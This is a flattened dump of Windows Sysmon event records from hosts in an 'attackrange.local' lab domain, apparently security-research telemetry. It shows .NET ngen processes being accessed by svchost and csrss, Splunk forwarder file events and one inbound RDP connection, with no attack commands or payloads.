14:57:50.514{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEE-607E-6A0D-00000000BB01}4108C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076248Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:50.498{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBEE-607E-6A0D-00000000BB01}4108C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076247Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:50.498{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEE-607E-6A0D-00000000BB01}4108C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000076246Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:50.358{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E996601F4E3CA5EA0A8C1D978F16166,SHA256=30DF333EA2674105697470E015AE56B9741DA40210C6ED3BC06DA4C1B320201B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076245Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:50.264{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEE-607E-690D-00000000BB01}2880C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076244Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:50.248{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBEE-607E-690D-00000000BB01}2880C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076243Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:50.248{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEE-607E-690D-00000000BB01}2880C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076242Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:50.186{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEE-607E-680D-00000000BB01}4600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076241Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:50.170{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBEE-607E-680D-00000000BB01}4600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076240Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:50.170{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEE-607E-680D-00000000BB01}4600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076239Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:50.123{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEE-607E-670D-00000000BB01}6748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076238Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:50.108{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBEE-607E-670D-00000000BB01}6748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076237Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:50.108{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEE-607E-670D-00000000BB01}6748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000076236Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:50.108{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2234ACF652F67BC091C6CD5FB66E9667,SHA256=1C7915A02CBDBC36C5710453F518C56DAAE92D0D7D41057F21F3EC0059FAC818,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076235Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:50.030{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEE-607E-660D-00000000BB01}5640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076234Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:50.014{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBEE-607E-660D-00000000BB01}5640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076233Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:50.014{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEE-607E-660D-00000000BB01}5640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000050332Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:50.994{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CD5989D6CF5FBA8B79E33740CE2D21B3,SHA256=5D26135998BE2B373A29A2C0A1ED9E43626B3F5A5008728A89C265143166DDC8,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050331Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:48.380{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-63655-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050330Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:50.588{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A17D110CB01943B638B750634CCB3774,SHA256=6AE472BD5285EE069EA08550120D0DD038F5A5C0C3E744C220851651CC1434FD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076305Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.967{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEF-607E-7B0D-00000000BB01}2952C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076304Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.951{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBEF-607E-7B0D-00000000BB01}2952C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076303Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.951{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEF-607E-7B0D-00000000BB01}2952C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076302Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.920{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEF-607E-7A0D-00000000BB01}6248C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076301Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.905{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBEF-607E-7A0D-00000000BB01}6248C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076300Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.905{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEF-607E-7A0D-00000000BB01}6248C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 